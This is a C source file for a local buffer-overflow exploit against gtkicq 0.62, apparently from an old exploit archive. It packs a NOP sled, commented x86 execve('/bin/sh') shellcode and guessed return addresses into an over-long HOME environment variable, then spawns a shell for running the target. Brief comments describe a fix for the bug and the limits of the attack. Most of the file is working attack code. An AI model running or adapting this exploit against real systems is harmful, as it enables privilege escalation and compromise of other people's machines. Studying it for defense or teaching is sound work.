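/*
 * gtkicq-0.62 "HOME" environment-variable overflow (util.c, rcfile.c)
 *   sebastien.roy@epitech.net
 *
 * gtkicq copies getenv("HOME") into a fixed-size buffer with strcpy()
 * and never bounds the length.  The environment is attacker-controlled
 * input, so an over-long HOME smashes the saved return address and, on a
 * 32-bit Linux/x86 target, runs the embedded execve("/bin/sh") shellcode.
 *
 * Fix for the vulnerable code: treat every environment variable as
 * untrusted input and copy it with a bounded, NUL-terminating call
 * (e.g. snprintf(buf, sizeof buf, "%s", home) and reject truncation).
 * Swapping strcpy for strncpy alone is NOT enough: strncpy does not
 * guarantee a terminator, and the caller still has to check the length.
 *
 * Payload layout.  This program builds the payload as a *path* and
 * mkdir()s every component of it (presumably gtkicq wants HOME to be an
 * existing directory).  That is also why the shellcode ends right before
 * "/bin/sh": the string the shellcode hands to execve is supplied by the
 * two path components appended after it.
 *
 *   home[0..5]     "/tmp/X"
 *   home[6..210]   NOP sled
 *   home[211..248] shellcode (38 bytes)
 *   home[249..255] "/bin/sh"  -- doubles as the execve() argument
 *   home[256..263] return address, twice (4-byte little-endian words)
 *   home[264..]    "/.icq/gtkicqrc", created so gtkicq reaches its rc code
 *
 * Usage: ./a.out [offset]   (default 256; subtracted from this process'
 *                            stack pointer to guess where the sled lands)
 *        then run gtkicq from the shell this program spawns.
 *
 * Caveats:
 *   - This only gains anything if gtkicq runs with different privileges
 *     than the invoking user; nothing in this listing shows it is setuid,
 *     so as written it is a demonstration, not an escalation.
 *   - 32-bit Linux/x86 only: int 0x80 shellcode and 4-byte return
 *     addresses.  ASLR, NX stacks and stack protectors defeat it as is.
 *   - The return address lives inside a path name and an environment
 *     string, so it must contain no 0x00 and no '/'.  main() refuses
 *     to continue if the guessed address does.
 */
#define _POSIX_C_SOURCE 200809L

#include <errno.h>
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

#define NOP    '\x90'
#define OFFSET 256                 /* default distance below our %esp */

enum {
    PREFIX_LEN = 6,                /* strlen("/tmp/X")                    */
    SLED_END   = 211,              /* first byte after the NOP sled       */
    RET_OFF    = 256,              /* where the return address is written */
    RET_WORDS  = 2,                /* it is written twice, back to back   */
    HOME_SIZE  = 300
};

/*
 * Classic Linux/x86 execve("/bin/sh") shellcode (jmp/call/pop trick).
 * The trailing call lands on the pop, leaving %esi pointing at the bytes
 * that follow the shellcode in memory; main() appends "/bin/sh" there.
 * The code writes a NUL after that 7-byte string and builds argv/envp in
 * place.  Nothing here may contain 0x00 or '/' (it is used as a path).
 */
char shellcode[] =
    "\xeb\x1f"                 /* jmp  +0x1f          (to the call)      */
    "\x5e"                     /* pop  %esi           (&"/bin/sh")       */
    "\x31\xc0"                 /* xor  %eax,%eax                         */
    "\x88\x46\x07"             /* mov  %al,0x7(%esi)  NUL after "/bin/sh"*/
    "\x89\x76\x08"             /* mov  %esi,0x8(%esi) argv[0]            */
    "\x89\x46\x0c"             /* mov  %eax,0xc(%esi) argv[1] = NULL     */
    "\xb0\x0b"                 /* mov  $0xb,%al       SYS_execve         */
    "\x89\xf3"                 /* mov  %esi,%ebx      path               */
    "\x8d\x4e\x08"             /* lea  0x8(%esi),%ecx argv               */
    "\x8d\x56\x0c"             /* lea  0xc(%esi),%edx envp               */
    "\xcd\x80"                 /* int  $0x80                             */
    "\x31\xdb"                 /* xor  %ebx,%ebx                         */
    "\x31\xc0"                 /* xor  %eax,%eax                         */
    "\x40"                     /* inc  %eax           SYS_exit           */
    "\xcd\x80"                 /* int  $0x80                             */
    "\xe8\xdc\xff\xff\xff";    /* call -0x24          (back to the pop)  */

/* The byte budget above is not negotiable: check it at compile time. */
_Static_assert(SLED_END + (sizeof shellcode - 1) + 7 == RET_OFF,
               "sled + shellcode + \"/bin/sh\" must end exactly at RET_OFF");
_Static_assert(RET_OFF + RET_WORDS * 4 + sizeof "/.icq/gtkicqrc" <= HOME_SIZE,
               "payload must fit in home[]");

/*
 * Return the current stack pointer (low 32 bits).  The original relied on
 * the asm leaving %esp in %eax and fell off the end of the function
 * (undefined behavior); an output constraint makes the intent explicit.
 * The target is a 32-bit process, so %esp is the value of interest.
 */
unsigned long get_sp(void)
{
    unsigned long sp;
#if defined(__i386__) || defined(__x86_64__)
    __asm__ __volatile__("movl %%esp, %%eax" : "=a"(sp));
#else
    /* Not an x86 host: the exploit cannot run here, but return a stack
     * address so the rest of the program still behaves sanely. */
    sp = (unsigned long)(uintptr_t)&sp;
#endif
    return sp;
}

extern char **environ;

/* mkdir() one payload path component; an existing one (re-run) is fine. */
static void make_dir(const char *path)
{
    if (mkdir(path, 0755) != 0 && errno != EEXIST) {
        perror("mkdir");
        exit(EXIT_FAILURE);
    }
}

/* Parse the optional offset argument; OFFSET when none is given.  Exits
 * on malformed input instead of silently treating it as 0 (atoi did). */
static long parse_offset(int argc, char **argv)
{
    if (argc < 2)
        return OFFSET;

    char *end;
    errno = 0;
    long v = strtol(argv[1], &end, 10);
    if (end == argv[1] || *end != '\0' || errno == ERANGE) {
        fprintf(stderr, "usage: %s [offset]\n", argv[0]);
        exit(EXIT_FAILURE);
    }
    return v;
}

/* The address is embedded in a path name and an env string: a 0x00 would
 * truncate it and a '/' would split it into another path component. */
static int addr_is_safe(uint32_t addr)
{
    for (int i = 0; i < 4; i++) {
        unsigned char b = (unsigned char)((addr >> (8 * i)) & 0xffu);
        if (b == 0 || b == '/')
            return 0;
    }
    return 1;
}

int main(int argc, char **argv)
{
    char home[HOME_SIZE];
    char *cmd[2];

    memset(home, 0, sizeof home);

    /* "/tmp/X" followed by the NOP sled up to (not including) SLED_END. */
    strcpy(home, "/tmp/X");
    memset(home + PREFIX_LEN, NOP, SLED_END - PREFIX_LEN);

    /* Shellcode, then "/bin/sh" as two path components, creating each
     * prefix as a directory on the way. */
    strcat(home, shellcode);
    make_dir(home);
    strcat(home, "/bin");
    make_dir(home);
    strcat(home, "/sh");
    make_dir(home);

    /* Guess where the sled sits in gtkicq's stack: our stack pointer
     * minus the offset.  Written as two consecutive 32-bit words
     * (presumably so the saved return address is hit even if the exact
     * slot is one word off).  memcpy avoids the misaligned
     * unsigned-long stores of the original, which also wrote 8 bytes
     * per word on LP64 hosts. */
    long offset = parse_offset(argc, argv);
    uint32_t retaddr = (uint32_t)(get_sp() - (unsigned long)offset);
    if (!addr_is_safe(retaddr)) {
        fprintf(stderr,
                "return address 0x%08lx contains 0x00 or '/'; pick another offset\n",
                (unsigned long)retaddr);
        return EXIT_FAILURE;
    }
    for (int i = 0; i < RET_WORDS; i++)
        memcpy(home + RET_OFF + 4 * i, &retaddr, sizeof retaddr);
    make_dir(home);

    /* HOME is now a real directory whose name is the payload. */
    if (setenv("HOME", home, 1) != 0) {
        perror("setenv");
        return EXIT_FAILURE;
    }

    /* Create $HOME/.icq/gtkicqrc so gtkicq finds an rc file (the header
     * names rcfile.c as one of the vulnerable files). */
    strcat(home, "/.icq");
    make_dir(home);
    strcat(home, "/gtkicqrc");
    int fd = open(home, O_CREAT | O_WRONLY, 0644);
    if (fd < 0) {
        perror("open");
        return EXIT_FAILURE;
    }
    close(fd);

    cmd[0] = "/bin/sh";
    cmd[1] = NULL;
    puts("run gtkicq from this shell.");
    execve(cmd[0], cmd, environ);
    perror("execve");              /* only reached if the exec failed */
    return EXIT_FAILURE;
}

/* www.hack.co.za [7 August 2000]*/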